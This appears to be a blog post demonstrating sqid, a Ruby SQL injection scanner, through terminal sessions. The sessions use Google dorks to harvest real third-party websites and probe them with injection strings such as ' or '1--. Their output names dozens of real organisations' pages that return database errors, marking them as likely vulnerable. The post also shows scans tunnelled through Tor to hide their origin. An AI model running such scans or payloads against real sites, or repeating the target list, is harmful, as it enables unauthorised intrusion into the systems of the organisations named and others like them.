It can perform the following operations:
- Look for SQL injection in a webpage, by looking for links.
- Submit forms in a webpage to look for SQL injection.
- Crawl a website to perform the above listed operations.
- Perform a google search for a query and look for SQL injections in the urls found.
Let's see it in action
sqid run with the help (-h) argument:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -h
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
Usage: sqid.rb [options]
options:
-m, --mode MODE Operate in mode MODE.
MODE is one of
g,google Operate in google search mode.
u,url Check this url or a file with urls.
p,page Check single page.
c,crawl Crawl website and check.
Google search mode options:
-q, --query QUERY QUERY to perforn google search for.
-s, --start START zero-based index of the first desired result,
zero if not specified.
-r, --results RESULTS number of results desired, default is 20 if not specfied.
rounded to tens.
URL check mode options:
-u, --url URL check this URL.
If URL is a file urls will be loaded from this file, specify each url on a new line.
Page check mode options:
-p, --page PAGE Check this page.
Crawl mode options:
-c, --crawl WEBSITE Crawl website WEBSITE and check.
specify as http[s]://WESITE:[PORT], default PORT is 80
URL, Page and Crawl mode common options:
-C, --cookie COOKIE Cookie in the HTTP header specify as name=value,name=value.
If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line.
-a, --accept-cookies Accept cookies from the webite or page. Default is no.
-R, --referer REFERER Set referer in the HTTP header.
-B, --auth CREDENTIALS Use credentials as basic auth for the website.
specify as user:password.
Common options:
-o, --with-noquery Match page content without query parameters. Default is false.
-D, --db-files FILE,...,FILE Use file(s) FILE,...,FILE as signature database.
-t, --trigger TRIGGER Use TRIGGER for detecting SQL injections/errors default is '.
If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline.
Lines starting with a # are ignored.
-T, --time-out TIMEOUT Timeout for response in seconds.
Default is 10 seconds.
-U, --user-agent USERAGENT User Agent in the HTTP Header. Default is SQID/0.3.
-P, --proxy PROXY User HTTP proxy PROXY for operations.
specfify as proxy:port.
-A, --proxy-auth CREDENTIALS Use crendtials CRENDENTIALS for the proxy.
specfify as user:password.
-v, --verbose Run verbosely.
-h, --help Show this message
Let's play with the google query:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -m g -q inurl:page.asp -s 0 -r 50
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[+] Getting 50 links from search inurl:page.asp starting from 0.
[+] Done got 50 links.
[*] Going to check 50 urls.
500 VBScript / ASP error => http://www.ddcf.org/page.asp?pageId='
500 MS-SQL Server error => http://www.unctad.org/Templates/Page.asp?intItemID='
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID='&DID=3079
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID=72&DID='
500 VBScript / ASP error => http://www.airweb.org/page.asp?page='
500 VBScript runtime error => http://www.airweb.org/page.asp?page='
Timed out => http://www.pebblebeach.com/page.asp?id='
500 VBScript / ASP error => http://www.royalsoc.ac.uk/page.asp?id='
500 VBScript runtime error => http://www.royalsoc.ac.uk/page.asp?id='
500 ADODB Error => http://www.yased.org.tr/page.asp?pageid='
500 VBScript / ASP error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript runtime error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript / ASP error => http://www.browsealoud.com/page.asp?pg_id='
500 VBScript runtime error => http://www.browsealoud.com/page.asp?pg_id='
[*] Warning: Client error 404 Page not found, http://policyresearch.gc.ca/page.asp?pagenm='.
500 VBScript runtime error => http://philanthropy.moodys.com/page.asp?template='&context=cmr§ion=hglts
500 No match => http://philanthropy.moodys.com/page.asp?template=cmr&context='§ion=hglts
Error getaddrinfo: No address associated with nodename, http://www.airindiaexpress.co.in/page.asp?pageid='.
500 VBScript runtime error => http://www.bscs.org/page.asp?pageid='&id=0%7Cevolution_programs
500 VBScript / ASP error => http://www.televue.com/engine/page.asp?cat='
500 VBScript runtime error => http://www.televue.com/engine/page.asp?cat='
500 MS-Access error => http://www.northernirelandscreen.co.uk/page.asp?id='
500 No match => http://www.airindia.com/page.asp?pageid='
500 MS-SQL Server error => http://www.seaair.info/page.asp?page='
[*] Checked 44 URLs.
closer look at the query; sqid.rb -m g -q inurl:page.asp -s 0 -r 50
-q query = "inurl:page.asp"
-s start with result 0
-r return 50 results
You can use sqid to check a URL:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -m u -u http://www.site.info/page.asp?page=
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[*] Going to check 1 urls.
500 MS-SQL Server error => http://www.site.info/page.asp?page='
[*] Checked 1 URLs.
You can use sqid to check a page:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -m p -p http://www.site.info/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[+] Getting links from page http://www.site.info/.
[*] Invalid URL: bad URI(is not URI?): %20http://www.site.org.za
[+] Done got 2 links.
[*] Going to check 2 urls.
500 MS-SQL Server error => http://www.site.info/page.asp?page='
[*] Checked 2 URLs.
You can use sqid to crawl a site as well:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Getting http://www.carnal0wnage.com/research.html.
[v] Getting http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Getting http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Getting http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Getting http://www.carnal0wnage.com/about.html.
[v] Getting http://www.carnal0wnage.com/links.html.
[v] Getting http://www.carnal0wnage.com//pvt/phackvideos.html.
[*] Warning: Client error 401 Authorization Required, http://www.carnal0wnage.com//pvt/phackvideos.html.
[+] Done got 32 links.
[*] Going to check 32 urls.
[v] Checking URL http://www.carnal0wnage.com/main.html.
[v] Checking URL http://www.carnal0wnage.com/papers.html.
[v] Checking URL http://www.carnal0wnage.com/hackvideos/index.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T2_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/research.html.
[v] Checking URL http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Checking URL http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Checking URL http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Checking URL http://www.carnal0wnage.com/about.html.
[v] Checking URL http://www.carnal0wnage.com/links.html.
[v] Checking URL http://www.carnal0wnage.com//pvt/phackvideos.html.
[*] Checked 32 URLs.
Tunnel that stuff through TOR:
SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -P localhost:8118 -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
---snip---
by default, sqid will only check for SQL injection with " ' " you can add your own trigger file if you want.
adding a trigger file:
SegFault:~/sqid/sqid cg$ cat trigger2
'
' or '1
' or ' 1
' or '1--
' or ' 1--
SegFault:~/sqid/sqid cg$ ruby sqid.rb -P localhost:8118 -m g -q inurl:login.asp -t trigger2
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org
[+] Getting 20 links from search inurl:login.asp starting from 0.
[+] Done got 20 links.
[*] Going to check 20 urls.
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20
----snip
-CG
No comments:
Post a Comment